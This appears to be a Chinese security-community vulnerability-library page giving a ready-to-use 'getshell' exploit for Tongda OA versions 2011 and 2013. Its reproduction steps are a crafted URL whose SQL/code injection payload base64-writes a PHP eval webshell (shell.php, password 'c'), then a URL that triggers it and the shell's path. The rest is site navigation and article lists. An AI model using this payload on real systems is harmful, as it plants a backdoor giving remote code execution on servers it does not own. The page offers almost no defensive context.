通达oa 2011-2013 通杀GETSHELL-漏洞文库小世界-安全文库-NGC660安全实验室

通达oa 2011-2013 通杀GETSHELL

好想告诉你徽章-备受喜爱-NGC660安全实验室等级-LV4-NGC660安全实验室1年前发布
270

通达oa 2011-2013 通杀GETSHELL

漏洞影响

2011、2013版本

复现过程

第一步:

http://url/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}

第二步:

http://url/general/email/index.php

SHELL:

http://url/general/email/shell.php 密码C

评分
欢迎为Ta评分
赏点小钱
分享
请登录后发表评论

    请登录后查看回复内容

用户封面
好想告诉你的头像-NGC660安全实验室
【作业】下内网之隧道代理05.17
【作业】5.10 漏洞复现-Thinkphp+shiro550+log4j2
CSZ CMS 1.2.7 储存型xss
CVE-2019-13086 CSZ CMS 1.2.2 sql注入漏洞
CVE-2018-7662 Couchcms 2.0 存在路径泄露漏洞
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具-NGC660安全实验室
2.6W+人已阅读
Kraken:一款基于爆破技术的多平台分布式密码安全测试工具
TOP1
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant-NGC660安全实验室
挑战亚马逊微软云市场“一哥”地位,谷歌拟54亿美元收购网安公司Mandiant
2年前6745人已阅读
TOP2
HTB靶机渗透系列之Sniper -NGC660安全实验室
HTB靶机渗透系列之Sniper 
2年前5795人已阅读
TOP3
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击-NGC660安全实验室
微软去年拦截了数百亿次暴力破解和网络钓鱼攻击
2年前1459人已阅读
TOP4
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉-NGC660安全实验室
Webshell管理工具流量检测研究:chopper、蚁剑、冰蝎、哥斯拉
2年前1437人已阅读
TOP5
【初级】Next.js目录遍历-NGC660安全实验室
【初级】Next.js目录遍历
2年前1207人已阅读
TOP6
【初级】WP Statistics SQL注入 (CVE-2022-25149)-NGC660安全实验室
【初级】WP Statistics SQL注入 (CVE-2022-25149)
2年前957人已阅读
TOP7
【初级】jira 未授权访问-NGC660安全实验室
【初级】jira 未授权访问
2年前769人已阅读
TOP8
【初级】artifactory 未授权访问-NGC660安全实验室
【初级】artifactory 未授权访问
2年前744人已阅读
TOP9
网络安全应急响应工具包合集-NGC660安全实验室
网络安全应急响应工具包合集
1年前698人已阅读
TOP10
圈子开耕者
分类-最近更新-NGC660安全实验室 11.7W+
最近更新
最近更新文章...
468篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
SubOver:一款功能强大的子域名接管测试工具
1年前
如何使用53R3N17Y完成主机网络侦查和信息收集任务
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
如何使用DragonCastle从LSASS进程中提取NTLM哈希
1年前
分类-安全新闻-NGC660安全实验室 2.1W+
安全新闻
分享安全时事,安全新闻播报推送
86篇文章更多文章
APT37针对韩国外交部下发RokRAT
1年前
暗网深度调查:Google Play恶意软件的供求生意
1年前
探析人工智能对网络安全的真正潜在影响
1年前
微信闪退BUG:一张神奇的二维码图片
1年前
印度跨国银行遭遇数据泄露,数百万敏感数据被公开访问
1年前
发布文章发布尘埃
扫码添加微信-NGC660安全实验室
在手机上浏览此页面